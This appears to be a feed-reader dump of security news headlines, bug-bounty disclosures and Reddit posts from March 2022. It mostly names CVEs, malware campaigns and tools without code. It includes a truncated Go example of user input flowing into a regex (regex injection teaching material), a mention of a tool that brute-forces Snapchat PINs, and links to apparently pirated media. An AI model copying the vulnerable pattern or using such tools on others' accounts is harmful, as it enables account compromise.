    Not all heroes wear a cape or get paid for their work Continue reading on Geek Culture »
  • Open

    Top 5 Topics to Discuss with Clients About Website Security
    If you’re a website developer or server administrator, it’s always a good idea to inform your clients about the basics of their website’s security and the inherent need for cautious security practices. Attacks and the methods of gaining access to a web server are always evolving, so it’s always in a client’s best interest to remain aware of the potential risks that come with owning a website. These topics should be considered by all website owners, not only site administrators or developers. Continue reading Top 5 Topics to Discuss with Clients About Website Security at Sucuri Blog.
  • Open

    Go Fuzzing
    Article URL: https://go.dev/doc/fuzz/ Comments URL: https://news.ycombinator.com/item?id=30848235 Points: 1 # Comments: 0
  • Open

    Ukraine: Situation update as of March 30
    The last 24 hours Continue reading on Medium »
    War in Ukraine / March 28
    The Molfar team sends a daily newsletter about the war in Ukraine. You can subscribe to the newsletter by sending your email address to… Continue reading on Medium »
    War in Ukraine / March 27
    The Molfar team sends a daily newsletter about the war in Ukraine. You can subscribe to the newsletter by sending your email address to… Continue reading on Medium »
    War in Ukraine / March 26
    The Molfar team sends a daily newsletter about the war in Ukraine. You can subscribe to the newsletter by sending your email address to… Continue reading on Medium »
    Factchecking. Bombing of the children’s hospital and maternity hospital in Mariupol
    Our investigation revealed lots of factual errors in the claims of the Russian propaganda media. Continue reading on Medium »
    Open-Source Intelligence — the Low Down
    The whos, hows and whens of emergent information gathering systems in geopolitics and warfare. It’s not all secret these days is it when… Continue reading on The Dock on the Bay »
    My first Trace labs CTF
    Today was the day, I woke up at 0730 had my coffee and checked my email, what did I find, another confirmation email from Human Decoded… Continue reading on Medium »
  • Open

    Identify the mobile number of a twitter user
    Twitter disclosed a bug submitted by aymen_mansour: https://hackerone.com/reports/1225164 - Bounty: $560
    2 click Remote Code execution in Evernote Android
    Evernote disclosed a bug submitted by hulkvision_: https://hackerone.com/reports/1377748 - Bounty: $750
  • Open

    pync - Netcat for Python
    submitted by /u/brenw0rth [link] [comments]
    Digital Forensics Basics: A Practical Guide for Kubernetes DFIR
    submitted by /u/MiguelHzBz [link] [comments]
    Linux kernel CVE-2022-1015,CVE-2022-1016 in nf_tables cause privilege escalation
    submitted by /u/Gallus [link] [comments]
    Busyloop in curl
    submitted by /u/RegularHumanoid [link] [comments]
    Ruby Deserialization - New Gadget Chain for Ruby on Rails
    submitted by /u/Gallus [link] [comments]
  • Open

    ABC-Code Execution for Veeam - @MDSecLabs
    submitted by /u/dmchell [link] [comments]
    Analyzing Docker Image for Retrieving Secrets
    submitted by /u/tbhaxor [link] [comments]
  • Open

    Data Exfiltration using RedDrop
    Introducing RedDrop — a quick and easy web server for capturing and processing encoded and encrypted payloads and tar archives. Continue reading on Maveris Labs »
    How to Write an Effective Pentest Report: 5 Key Sections
    As a pentester, you play a critical role in helping to secure an organization’s infrastructure, assets, and data from bad actors. While… Continue reading on Medium »
    How Clubhouse user scraping and social graphs
    TL;DR During this RedTeam testing, we used Clubhouse as a social engineering tool to find out more about our client’s employees. Continue reading on Medium »
    Reading Windows Sticky Notes
    Sticky Notes has been part of Windows since at least Windows 7. For those who aren’t familiar with it, Sticky Notes allows the user to add… Continue reading on Medium »
  • Open

    [Cullinan #30] Add ReDOS and Regex Injection
    This is Cullinan log #30. I added ReDOS and Regex Injection. I also split the CSP bypass material within XSS out of the Bypass protection subsection into a separate Bypass CSP section, and while at it added bypass patterns that had been missing. I also created a separate CSP entry under Defensive techniques. Add ReDOS Add Regex Injection Change XSS (Bypass CSP) Change XSS (Add CSP in Defensive techniques)
    Regex Injection
    🔍 Introduction Regex Injection is an injection attack in which the attacker can influence the regex pattern before the regex is compiled. The injection itself does not have a large impact, but it makes it easy to trigger ReDOS. 🗡 Offensive techniques Detect With Sourcecode If you have the source code, check whether user input affects the regular expression syntax. The typical case is a regular expression built from an external parameter. Code data := c.Param("user_data") body := c.Param("user_body") r, _ := regexp.
    ReDOS (Regex DOS)
    🔍 Introduction ReDOS is a security problem that can occur when input for a regular expression is received from the user. Commonly called ReDOS or Regex DOS, it is a way to degrade a service's availability with a single web request, using self-repeating grouped regular expressions together with a large number of characters that satisfy the regex validation logic. ReDOS occurs when the regexp engine uses its backtracking feature: while processing the regular expression, this feature retries inefficient operations many times in order to explore every possible path. As a result, system resources are exhausted and a DOS can be carried out.
  • Open

    Autopsy Cannot View Extracted Content In Results
    Hi. I'm new to Autopsy. I'm using the Windows version, but I have also tried using it as part of the CAINE toolkit on a Linux VM, and I have the same problem. I am unable to view the Extracted Content drop-down, which should show interesting observations by the tool for this specific USB image file. It should also show Web Artifacts, which is absolutely crucial for this analysis. Do I need to download specific modules to view those results? Where do I get them from? I'd really appreciate any help in this regard. Thanks. https://preview.redd.it/zujbu7eticq81.png?width=620&format=png&auto=webp&s=2a6e9fd19dd7fb96bb78e373ac792d08fb52966e submitted by /u/ResourceGlum6199 [link] [comments]
    Digital Forensics Basics: A Practical Guide for Kubernetes DFIR
    submitted by /u/MiguelHzBz [link] [comments]
    Is it possible to transition from LE forensics to a business role?
    Hello, whilst aiming for an entry-level business analyst job, I fell into a law enforcement digital forensic role and have remained there for 3 years as a digital forensic analyst. This is my first serious job, so I don't really have experience elsewhere. I do have IT industry certs (none of the major ones) but no degree. Whilst in this role, I have made a couple of extremely minor operational changes (by minor, I mean barely making it to the CV/resume), which has reminded me of my drive for a business analyst type role. My salary is decent for this type of role and is more than what an entry-level business analyst role would be. I would be willing to take a small pay cut, but from what I've seen it would be around a 10k pay cut, which I just cannot absorb. Besides the problem mentioned above, if at all possible, how would I transition from this role to a business role, e.g. business analyst/design? Has anyone done the same? I considered writing in r/careerguidance, but I cannot imagine many people in that subreddit knowing much about LE forensics. submitted by /u/gofigured21 [link] [comments]
    Telephone data collection
    Can someone let me know how I can extract data from landline phones? The data required is phone records, phone recordings, etc. submitted by /u/Pepperknowsitall [link] [comments]
    How hard is it to examine iPhones?
    Is it frustrating to have to examine iPhones or any specific model of phone? I understand most smartphones use encryption, and some claim that most of your data is gone after a reset, but is that really true? I don't believe any encryption is strong; it can probably be bypassed. submitted by /u/Ill-Date-1852 [link] [comments]
  • Open

    SecWiki News 2022-03-29 Review
    Fvuln: an automation tool by ourren How to build a knock-off BAB solution out of open-source components by ourren Putting software supply chain security assurance into practice, seen through mainstream secure development frameworks by ourren For more of the latest articles, visit SecWiki
  • Open

    FreeBuf Morning Report | Fastest ransomware encrypts 53GB of data in 4 minutes; some apps read clipboard user information
    A ransomware strain named LockBit is remarkably efficient: within four minutes it encrypted nearly 100,000 data files, about 53GB, on a single Windows server.
    Kimsuky launches attacks against cryptocurrency companies and the retail industry
    Kimsuky uses cryptocurrency-related information as decoy documents, which suggests the attacks are aimed at cryptocurrency companies.
    Ukrainian telecom network services temporarily interrupted after cyberattack
    The share of Ukrtelecom services that are operating normally has fallen to 13% of the level before the Russia-Ukraine war.
    CISA urges agencies and organizations to patch Chrome and Redis vulnerabilities
    Recently, the US Cybersecurity and Infrastructure Security Agency (CISA) ordered federal civilian agencies to patch a Google Chrome zero-day vulnerability and a significant Redis vulnerability within the next three weeks.
    GhostWriter APT group uses Cobalt Strike Beacon to attack Ukrainian state entities
    Recently, Ukraine's CERT-UA discovered a spear-phishing campaign run by the Belarus-linked GhostWriter APT group, which attacks Ukrainian state entities with the Cobalt Strike Beacon malware. The phishing emails use a RAR archive named "Saboteurs.rar", which contains the RAR archive "Saboteurs 21.03.rar". The second archive contains the SFX archive "Saboteurs filercs.rar"; experts claim that this
    Russia faces an internet communications crisis due to equipment shortages
    Owing to a lack of available telecom equipment, internet service within Russia is about to suffer large-scale disruption.
    Biden administration releases $5.8 trillion budget, cybersecurity budget increases again
    Compared with fiscal year 2022, the Biden administration has again increased the cybersecurity budget by several billion.
    Research finds early "triple extortion" ransomware SunCrypt still active today
    As a RaaS (ransomware-as-a-service), SunCrypt was rampant in 2020; although it went quiet afterwards, the latest findings show the ransomware is still active from time to time.
    Gartner releases "China Cloud Security Market Overview": a close look at how cloud security is entering a golden age
    Gartner expects that by 2024 nearly 40% of Chinese end-user spending on system infrastructure and infrastructure software will shift to cloud services.
  • Open

    1-13 of Spongebob Squarepants, 3 movies and Kamp Koral and Patrick Star show
    https://drive.google.com/drive/folders/12kw4rOnqnyj0vNF8SOfQZZpI9HLfzqkl submitted by /u/LateDream [link] [comments]
  • Open

    Profiling a Currently Active High-Profile Cybercriminals Portfolio of Ransomware-Themed Extortion Email Addresses - Part Five
    I've decided to continue the "Profiling a Currently Active High-Profile Cybercriminals Portfolio of Ransomware-Themed Extortion Email Addresses - Part Four" blog post series and I've decided to issue yet another update in terms of currently active ransomware-themed personal email address accounts. Sample list of currently active ransomware-themed email address accounts includes: restorealldata@
  • Open

    Hackers use phishing emails to distribute IcedID malware
    Translator: Knownsec 404 Lab translation team. Original link: https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/ This article presents the technical analysis of a new attack campaign discovered by the Intezer research team, in which the attackers start with a phishing email and use conversation hijacking to deliver IcedID. The underground economy keeps evolving, with attackers specializing in...
  • Open

    Computer Science or Cyber Security degree?
    Hey everyone, I'm in high school right now, and am 100% sure I want to work with computers, and like 80% sure I want to work in cybersec. Should I go for a cyber security degree or computer science? submitted by /u/OpBanana1 [link] [comments]
    Web app pentesting technical tutorials/checklists
    Hi! I was wondering if anyone knew any resources (website guides, books) for pentesting web apps, with specific examples of how they're done with modern (or somewhat modern) tools? I see a lot of checklists about what to test but not really how to test them or they mention how to test them at a high level. There's youtube videos and stuff but I was hoping there was a centralized resource that was more in text, but if there's a good playlist of youtube videos then that's cool too! Thanks! submitted by /u/Epsi0 [link] [comments]
    Server Internet access - block by default?
    What is the opinion these days of blocking internet access from servers that don't need it? We use local patch management and almost all of our services are internal. We've been breached (before I started) multiple times, and are using geoblocking for both inbound and outbound traffic. Just wondering if it really makes a difference. submitted by /u/brettfk [link] [comments]
    Is my pentest report ok?
    Hello, my name is Fred. I'm an ethical pentester and hacker. Top 1000 THM & HTB. I just did an NMAP and a Nessus. I don't have time to write a report - can I just give the customer my Nessus scan pentest report? submitted by /u/mrdeadbeat [link] [comments]
    Tracking vulnerabilities for non-technical staff
    What is the best way to track the remediation of vulnerabilities (not just discover them)? We use tools like Nessus to discover vulnerabilities, but I'm looking to allow tracking of the process of remediation across multiple non-security teams (such as assigning tasks to sysadmins and allowing project managers to track). I'd like something more auditable than an Excel file sitting on SharePoint... We do have an internal ticketing system, but I feel like there's a better solution out there. submitted by /u/Securivangelist [link] [comments]
  • Open

    Redacted Cartel Custom Approval Logic Bugfix Review
    Summary Continue reading on Immunefi »
    Broadening our Bug Bounty Program: Trust, Security, and Transparency
    We’re expanding our public bug bounty program for Palantir’s software and infrastructure. Continue reading on Palantir Blog »
    Zenlink partners with Immunefi and launches a bug bounty program
    Today, 23 March 2022, we are pleased to announce that Zenlink has partnered with Immunefi and launched a bug bounty program. Continue reading on Medium »
    Zenlink partners with Immunefi and launches a bug bounty program
    Today, 23 March 2022, we are pleased to announce that Zenlink has partnered with Immunefi and launched a program for… Continue reading on Medium »
    Use of Default Credentials to Unauthorised Remote Access of Internal Panel of Network Video…
    👨🏼‍💻Discovered by Dnyanesh A. Gawande Continue reading on Medium »
    One-liner Bug Bounty Tips
    A collection of awesome one-liner scripts especially for bug bounty. Continue reading on Medium »
    Google Dork for instant bounties
    Google dorks that’ll get you instant bounties, proven and tested multiple times. Continue reading on Medium »
  • Open

    Ukraine — Situation update as of 29 March
    The last 24 hours Continue reading on Medium »
    TryHackMe: OhSINT Room Write-Up (No Answers)
    OhSINT Room Description: “Are you able to use open source intelligence to solve this challenge?” Continue reading on Medium »
    Analysis of espionage through open sources
    Open sources (in English: open source) is a technical term that denotes a product that includes a license to use its source code… Continue reading on Bureau International »
  • Open

    [Patch now!] Multiple Flaws In Azure Allow Remote Code Execution for All
    submitted by /u/GHIDRAdev [link] [comments]
  • Open

    Denial of Service vulnerability in curl when parsing MQTT server response
    curl disclosed a bug submitted by jenny: https://hackerone.com/reports/1521610
    EC2 Takeover at turn.shopify.com
    Shopify disclosed a bug submitted by 0xd0m7: https://hackerone.com/reports/1295497 - Bounty: $500
  • Open

    Climate Change 2022: Impacts, Adaptation and Vulnerability [pdf]
    Article URL: https://www.ipcc.ch/report/ar6/wg2/downloads/report/IPCC_AR6_WGII_SummaryForPolicymakers.pdf Comments URL: https://news.ycombinator.com/item?id=30834777 Points: 2 # Comments: 0
    Critical Sophos Firewall vulnerability allows remote code execution
    Article URL: https://www.bleepingcomputer.com/news/security/critical-sophos-firewall-vulnerability-allows-remote-code-execution/ Comments URL: https://news.ycombinator.com/item?id=30830479 Points: 2 # Comments: 0
  • Open

    Popcap + GameHouse games installers
    https://drive.google.com/drive/folders/1_3uk_FxyOfxJhmi79vHkseyrwhl5NaQj?fbclid=IwAR3XO8GsSlrK-ii_hgKiYPnbIUkhb5p97xraZ-lATGa9zYDn8HWdqw8lubc submitted by /u/baconpancakesboii [link] [comments]
    Large archive
    http://136.35.236.43/shared/ submitted by /u/ilikemacsalot [link] [comments]
    LLOD 03-27-22 (Large List Of Open Directories)
    http://techmedic.us/d/ http://sdfox7.com/win95/ http://sdfox7.com/netscape/ http://sdfox7.com/macppc/ https://mactorrents.io/wp-content/uploads/ http://51.15.171.201/141/ http://www.mac-torrent-download.net/wp-content/uploads/ http://www.vfxhq.com/overflow/macaddict/ http://www.newlaunches.com/entry_images/ https://download.panic.com/ http://hl.udogs.net/files/ https://mc68000.org/downloads/ https://defhoboz.biz/ http://freeware.epsc.wustl.edu/ http://www.sfu.ca/person/dearmond/322/ http://ccp14.cryst.bbk.ac.uk/ccp/ http://gentoo.mirror.beocat.ksu.edu/portage/app-arch/stuffit/ http://ftpmirror.your.org/ https://soft.uclv.edu.cu/isos/MacOS/MAC%20Leopard/Utiles/ http://baby.indstate.edu/msattler/ https://www.w3.org/History/ https://ftp.swin.edu.au/ https://www.ifarchive.org/if-archive/ http://wreckcenter.com/68k/ Extra random image: http://www.newlaunches.com/entry_images/260805/battery.bmp submitted by /u/ilikemacsalot [link] [comments]
  • Open

    CVE-2022-0995 exploit - heap out-of-bounds write in the watch_queue Linux kernel component
    submitted by /u/0xdea [link] [comments]
    CVE-2022-27666: Exploit esp6 modules in Linux kernel
    submitted by /u/0xdea [link] [comments]
    LDAP relays for initial foothold in dire situations
    submitted by /u/AlmondOffSec [link] [comments]
    New Suncrypt ransomware discovered with added capabilities
    submitted by /u/woja111 [link] [comments]
    OPNSense Firewall Bypass with Carp
    submitted by /u/oherrala [link] [comments]
    Google Issues Urgent Chrome Update to Patch Actively Exploited Zero-Day Vulnerability. CVE-2022-1096 is the second zero-day vulnerability addressed by Google in Chrome since the start of the year.
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    Courtesy of Republic of Bulgaria! - Part Four
    For you there's no such thing as a link you can click on? Guess what? I won't tell you. Guess what again? The word is this - a basic link which you're forbidden from clicking on. It's called "The Twilight Zone". Good luck in living there and don't forget to spend the rest of your time watching the Outer Limits. You wish! Related posts: Courtesy of Republic of Bulgaria! - Part Three Courtesy
  • Open

    SecWiki News 2022-03-28 Review
    OpenCTI Beginner Notes (2): storage settings, cleanup, and changing the icon and title by ourren CodeCat: a powerful static code analysis tool by ourren A brief analysis of the attack-defense simulation tool CyberBattleSim by ourren How to work through so many security articles (theory) by ourren A compilation of HVV (护网) related knowledge by ourren A first look at the use of digital currency on the dark web by ourren eCapture: capturing HTTPS plaintext traffic without a CA certificate by ourren Lessons from the Russia-Ukraine cyber war by ourren What can we learn from Japan's cybersecurity work for the Tokyo Olympics? by Avenger SecWiki Weekly (Issue 421) by ourren For more of the latest articles, visit SecWiki
  • Open

    FreeBuf Morning Report | Ransomware attacks in the UK surged 100% in 2021; US and EU agree to reopen transatlantic data flows
    According to a new analysis, the number of ransomware attacks reported to the UK data protection regulator more than doubled during the pandemic period from 2020 to 2021.
    Anonymous leaks 28GB of data stolen from Russia's central bank
    Recently, the Anonymous collective disclosed 28GB of stolen data through its Twitter account (@Thblckrbbtworld).
    US FCC adds Kaspersky, China Telecom and China Mobile to national security threat list
    Both Kaspersky and the Chinese embassy in Washington have responded.
    Latest Chrome zero-day vulnerability patched
    An emergency Chrome browser update fixes a zero-day vulnerability.
    Sophos Firewall affected by a critical authentication bypass vulnerability
    Recently, Sophos fixed an authentication bypass vulnerability in the User Portal and Webadmin areas of Sophos Firewall, tracked as CVE-2022-1040. CVE-2022-1040 has a CVSS score of 9.8 and affects Sophos Firewall version 18.5 MR3 (18.5.3) and earlier. In a recently updated advisory, Sophos said that the User Portal and Webadmin of Sophos Firewall were found to contain this remote-code-execution-enabling authentication
  • Open

    Browser-in-the Browser (BITB) — A New Born Phishing Methodology
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    Kazakhstan's unrest from a cyberspace perspective
    Author: Knownsec 404 Lab. Original download: 知道创宇404实验室网络空间视角下的哈萨克斯坦动乱.pdf 1. Background: At the start of 2022, protests broke out in Zhanaozen, an oil town in western Kazakhstan, and quickly spread to other cities including Almaty. The protests grew from resistance to a surge in liquefied petroleum gas prices into violent riots. Some demonstrators even stormed the government of the former capital Almaty, and the Almaty city government and prosecutor's office were set on fire. But as CSTO member states sent troops to assist Kazakhstan, Kazakhs...
    Linux kernel protection mechanism bypass
    Author: 时钟@RainSec. Original link: https://mp.weixin.qq.com/s/gSTbXW6M72QYtVPoZswhyw Preface: It has been a while since I worked on kernel bugs; recently I have been analyzing quite a few of them, with a fair number of related exploit tasks, so I am writing up what I learned to make it easier to look up and remember. SMEP + KPTI bypass: SMEP stands for Supervisor Mode Execution Prevention; its main purpose is...
    Go-fuzz analysis and reflections
    Author: 时钟@RainSec. This article is a reader contribution; Seebug Paper looks forward to your submissions, and every accepted article receives a gift! Submission email: paper@seebug.org go-fuzz: Much of go-fuzz's design is based on AFL, so here I only analyze some of its distinctive parts. I learned a lot and hope to exchange ideas with everyone; if there are mistakes in the analysis, please point them out. go-fuzz is a Go-language fuzzing framework open-sourced by Google; one big difference from AFL is that...
    Arkei variants: from Vidar to Mars Stealer
    Translator: Knownsec 404 Lab translation team. Original link: https://isc.sans.edu/diary/rss/28468 Introduction: Sometime in 2018, an information stealer named Vidar appeared. Analysis showed that Vidar was a copy of the Arkei malware. Since then, Vidar has in turn inspired other Arkei-based variants. Today's article reviews Vidar and two other variants: Oski Stealer and Mars S...
  • Open

    Intigriti’s March XSS Challenge By BrunoModificato
    This month’s challenge was a bit tricky, but still fun nonetheless. The main goal is to bypass CSP protection in a way that is not… Continue reading on Medium »
  • Open

    Sans Sift vs CSI Linux
    Hi Team, I just have a quick question for you. In your opinion, what are the similarities and differences of SANS SIFT Workstation and CSI Linux? submitted by /u/bankshot15 [link] [comments]

  • Open

    SELECTING OSINT SERVICES FROM CYBER GRANDFATHER!
    https://t.me/BrainHaking2_0ENG/53 Continue reading on Medium »
    Ukraine — Situation update as of 28 March
    The last 24 hours Continue reading on Medium »
    SPY NEWS: 2022 — Week 12
    Summary of the espionage-related news stories for the Week 12 (20–26 March) of 2022. Continue reading on Medium »
  • Open

    meobrute - Automate the process of brute forcing the My Eyes Only pin code on Snapchat
    submitted by /u/rushedcar [link] [comments]
    Pulling user data from iPhone data
    Device: iPhone 5c, build 13e237. I have scraped the serial and IMEI and I have the device name; however, with a barebones phone without any apps having been used, is there a location to pull the owner's registered information without access to the SIM? submitted by /u/CoreRun [link] [comments]
  • Open

    Able to steal bearer token from deep link
    Basecamp disclosed a bug submitted by danielllewellyn: https://hackerone.com/reports/1372667 - Bounty: $6337
  • Open

    Have there ever been audits of Google Authenticator to confirm that Google cannot read your 2FA codes?
    Google's entire business model revolves around collecting user data and has a confirmed history of working with authorities to monitor individuals in the US and abroad. Google Authenticator app is also the most popular 2FA that exists presently. Has anyone in the NetSec community confirmed that Google does not collect 2FA information from the app and store the seed needed to generate codes on its servers? submitted by /u/JamieOvechkin [link] [comments]
    questions from WAHH?
    There are some lab URLs mentioned in the book, like http://mdsec/xyz/1837, but these are not live. My question is: has anyone solved those in the past, and how are the labs on the PortSwigger academy compared to those? submitted by /u/Dry-Brilliant3087 [link] [comments]
    Virtual Machines
    Are the abilities of a computer being used in a botnet bottlenecked in any way when it is being run through a VM? submitted by /u/satellitesatan [link] [comments]
  • Open

    Solution to my $20 egg hunt (Part 3)
    My latest article gave a significant hint towards solving the $20 challenge. This one will help you a few steps further… Continue reading on Medium »
  • Open

    Lateral Movement: Remote Services (Mitre:T1021)
    Introduction During Red Team assessments, after a compromise has been done, attackers tend to laterally move through the network gaining more relevant information on other The post Lateral Movement: Remote Services (Mitre:T1021) appeared first on Hacking Articles.
  • Open

    SecWiki News 2022-03-27 Review
    No news updated today~ For more of the latest articles, visit SecWiki
  • Open

    Scheduled Tasks and Batteries
    Krzysztof shared another blog post recently, this one that addresses the battery use and the battery level of a system, and how it applies to an investigation. At first thought, I'm sure a lot of you are asking, "wait...what?", but think about it for a moment. Given the pandemic, a lot of folks are working remote...a LOT. There are a number of firms that are international, with offices in a lot of different countries all over the world, and a great many of those folks are working remotely. Yes, we've always had remote workers and folks working outside of office environments, but the past 2+ years have seen something of a forced explosion in remote workers. Those remote workers are using laptops. And it's likely that they're not always connected to a power supply; that is, there will be tim…
  • Open

    FreeBuf Morning Report | Nestlé says its data was leaked by itself, not stolen by Anonymous; US adds China Telecom and others to security threat list
    On 25 March local time, the US Federal Communications Commission (FCC) added China Telecom (Americas), China Mobile (USA), Kaspersky and other companies to its list of communications equipment and service providers that pose a threat to US national security.
  • Open

    Introduction to CSRF: How can a cookie get you hacked
    submitted by /u/gooldopt [link] [comments]
  • Open

    flying spaghetti monster
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Since they'll be in the news following Taylor Hawkins death.
    https://www.ashleecadell.com/xyzstorelibrary/Foo%20Fighters/ yes - I am aware the parent directory has been posted recently. http://pitofdespair.randominsanity.org/music/Luna/Foo%20Fighters/ http://109.120.203.163/Music/grunge/Foo%20Fighters/ ditto for this one submitted by /u/ringofyre [link] [comments]
  • Open

    Real talk
    submitted by /u/DrinkMoreCodeMore [link] [comments]

  • Open

    oss-security - Re: zlib memory corruption on deflate (i.e. compress)
    submitted by /u/Gallus [link] [comments]
    PHP filter_var shenanigans
    submitted by /u/Gallus [link] [comments]
    Mining data from Cobalt Strike beacons
    submitted by /u/digicat [link] [comments]
    Using the Dirty Pipe Vulnerability to Break Out from Containers
    submitted by /u/freakwin [link] [comments]
  • Open

    Ukraine — Situation update as of 26 March
    The last 24 hours Continue reading on Medium »
  • Open

    CVE-2022-1096: Type Confusion in V8, exploit exists in the wild
    Article URL: https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html Comments URL: https://news.ycombinator.com/item?id=30814231 Points: 2 # Comments: 0
    Chrome 0day is being exploited now for CVE-2022-1096; update immediately
    Article URL: https://www.forbes.com/sites/daveywinder/2022/03/26/google-confirms-emergency-security-update-for-32-billion-chrome-users-attacks-underway/ Comments URL: https://news.ycombinator.com/item?id=30813779 Points: 257 # Comments: 141
  • Open

    [Security Bulletin] Spring Cloud Function SPEL remote command execution vulnerability
    Recently, Spring Cloud Function's official test cases exposed a Spring Cloud Function SPEL expression injection vulnerability; by injecting into SPEL expressions, the vulnerability can lead to remote command execution.
  • Open

    OTP reflecting in response sensitive data exposure leads to account take over
    UPchieve disclosed a bug submitted by rupachandransangothi: https://hackerone.com/reports/1318087
    No Rate Limit on forgot password page
    UPchieve disclosed a bug submitted by pranto_0: https://hackerone.com/reports/1317494
    Password reset token leakage
    UPchieve disclosed a bug submitted by ww1: https://hackerone.com/reports/1354437
    Missing Validation in editing "Your Phone Number"
    UPchieve disclosed a bug submitted by ww1: https://hackerone.com/reports/1354368
    Password Reuse
    UPchieve disclosed a bug submitted by ww1: https://hackerone.com/reports/1354382
    Outdated Copyright Message @ Welcome email
    UPchieve disclosed a bug submitted by ww1: https://hackerone.com/reports/1354444
    No rate Limit on Password Reset page on upchieve
    UPchieve disclosed a bug submitted by rupachandransangothi: https://hackerone.com/reports/1320138
    Clickjacking login page of https://hackers.upchieve.org/login
    UPchieve disclosed a bug submitted by sara346: https://hackerone.com/reports/1331485
    No Rate Limiting for Password Reset Email Leads to Email Flooding
    UPchieve disclosed a bug submitted by bd10ceb041a5297f881137c: https://hackerone.com/reports/1340650
  • Open

    Using the Dirty Pipe Vulnerability to Break Out from Containers
    Article URL: https://www.datadoghq.com/blog/engineering/dirty-pipe-container-escape-poc/ Comments URL: https://news.ycombinator.com/item?id=30813614 Points: 2 # Comments: 0
  • Open

    SecWiki News 2022-03-26 Review
    Using open-source intelligence to discover and explain malicious behavior by ourren For more of the latest articles, visit SecWiki
  • Open

    Vulnerability Intelligence | Spring Cloud Function SPEL expression injection vulnerability bulletin
    Recently, Spring Cloud Function's official test build revealed a Spring Cloud Function SPEL expression injection vulnerability. Using this vulnerability, attackers can carry out remote injection attacks by injecting specially crafted SPEL expressions. Given that the components related to Spring Cloud Function have a limited range of use, and that the vulnerability cannot be triggered under the default configuration, the real-world impact should not be high. FreeBuf rates this vulnerability as "Medium". Vulnerability description: S
  • Open

    Stuxnet worm | The world's first digital weapon
    submitted by /u/OkFaithlessness2414 [link] [comments]
  • Open

    pictures from a monster raving loony candidate
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    ToolsRus CTF — Writeup
    In this CTF we have multiple tools we’ll use to enumerate, exploit to gain access and then catch a shell to capture the flag. Continue reading on Medium »
    Cybersecurity Adventure
    This blog will be a way for me to share with you my journey through cybersecurity. I will do this by creating walkthroughs ranging from… Continue reading on Medium »
  • Open

    Reverse Engineering Fortinet Fortigate Devices
    I want to view the traffic between a FortiGate device and the Fortinet APIs (where Fortinet gets updates, threat intelligence, etc.). I've got a VM of FortiGate and I've got it proxying traffic via Burp Suite. I'm fairly sure that the FortiGate device has SSL pinning enabled, because despite adding my CA cert, I still can't see the traffic. Questions: how would I gain root on this device? Secondly, how would I remove the SSL pinning or replace the cert? submitted by /u/danchuckaway27 [link] [comments]
    Recommendation
    Currently my supervisor has asked me to check Acunetix and Qualys (I haven't used these before). Any recommendation on why I would recommend Acunetix over Qualys, and vice versa? Thank you. I prefer Acunetix because the company is using PHP, and because of Acunetix's interface and ease of use. submitted by /u/pldc_bulok [link] [comments]
    Malicious email tools in O365
    Can someone point me to the best education/information on how to properly use all tools available for security around O365 email? submitted by /u/rogueit [link] [comments]
    Outlook gives "site security cert invalid" message, further viewing shows weirdness?
    Hi all, I use Office365 and have Outlook installed on my W10 machine. Have operated this way for years. I have some basic infosec knowledge, at least to the point where I know what to avoid and what steps to take to keep myself somewhat secure. From time to time a message pops up in Outlook telling me that a site security cert has a problem. Normally I just ignore it, but today decided to look into it further. When I view the certificate details, the thing that popped out to me was a Huawei email address. Screenshots Now I think I'm just being curious/paranoid, but figured I'd ask because at the least I'd get a better understanding of what's happening. Am I right in thinking that this relates to a particular email message containing content that's hosted somewhere, and that's what Outlook is hesitant to access? Or does this relate to something else? Rather than this being the CCP having broken into my house and installed a custom CPU containing embedded backdoor access into my decade-old gaming rig, I would think that this probably relates more to major back-end backbone infrastructure stuff, which Huawei does a lot of, so it is probably more along those lines? Any info appreciated. p.s. don't need to be told to use different email/PC/internet/security/OS, but I understand it's a natural reflex many of you can't control :D submitted by /u/JForce1 [link] [comments]

  • Open

    Enhance Network security skills advice ?
    Hello, I am currently a rising senior going to graduate with a Management of Info. Systems B.S., and I am very interested in cybersecurity. I've been studying for S+ & N+ and that has helped my cyber knowledge tremendously. I was wondering how I can enhance my skills? I want to join a red team for a big company. Any tips on how to perform penetration tests? How to perform network scans? And how to look for vulnerabilities? What software do I need? I've been trying to use Kali Linux but it's so hard to download on Mac. Any tips? I know most of the basic cybersecurity knowledge, I just want to apply it and practice! submitted by /u/AffectionateDot4877 [link] [comments]
    Tests to run on a Raspberry Pi with the LoRa protocol
    Hi, I have a very general inspiration problem. I'm currently doing my MSc thesis. We are implementing a protocol (kinda like the Signal one) for LoRa networks. We have the protocol implemented in Rust, and the plan was to put it onto a constrained device that we had found, and then measure the power consumption of the protocol. We have run into a roadblock, though: the devices we had in mind are incompatible with the LoRa resource we have at hand. So now we're putting the project on a Raspberry Pi instead. This kinda ruins the whole idea of reading the power usage of the device, since the Raspberry Pi consumes so much power that power readings won't really make much sense. So what I want to ask the creative minds of asknetsec is if anyone can think of any measurements, or interesting academic experiments, that one could do with the Raspberry Pi? Checking security properties in some way or something? Or is there a cool way of measuring power on a Raspberry Pi that can abstract away some of the operations that the Pi does usually? submitted by /u/GarseBo [link] [comments]
    OWASP ZAP with google authentication?
    Can I run OWASP ZAP on a webapp that uses google authentication? or provide it a cookie from a browser that is already authenticated to said app? I can't find anything about google authentication in the documentation. submitted by /u/Individual-Quarter47 [link] [comments]
    Looking for insight/experience on PAM solutions from an offensive perspective
    Hello, As the title says, I'm trying to gather some insight to PAMs (such as Thycotic and CyberArk) from the perspective of red teamers/pentesters. Google hasn't turned up much in the way of blogs or writeups. Our company is in talks with a vendor to implement this type of software, and I'm not seeing eye-to-eye with the reps. They claim it will mitigate most common AD attacks against privileged accounts, but I'm struggling to see how exactly it will mitigate attacks such as PtH and forging tickets. Understandably, it will make it harder to capture a hash and cut down on persistence if the passwords are regularly rotated, but it certainly doesn't make it impossible (or even improbable) to execute these traditional attacks. So, if anyone has any first hand experience or a link to a good blog/writeup, I would be very appreciative. In addition, with consideration to what I've asked, I also welcome your opinion on 'is it worth it'. Thank you in advance. submitted by /u/GrandWheel50 [link] [comments]
    education pathing advice
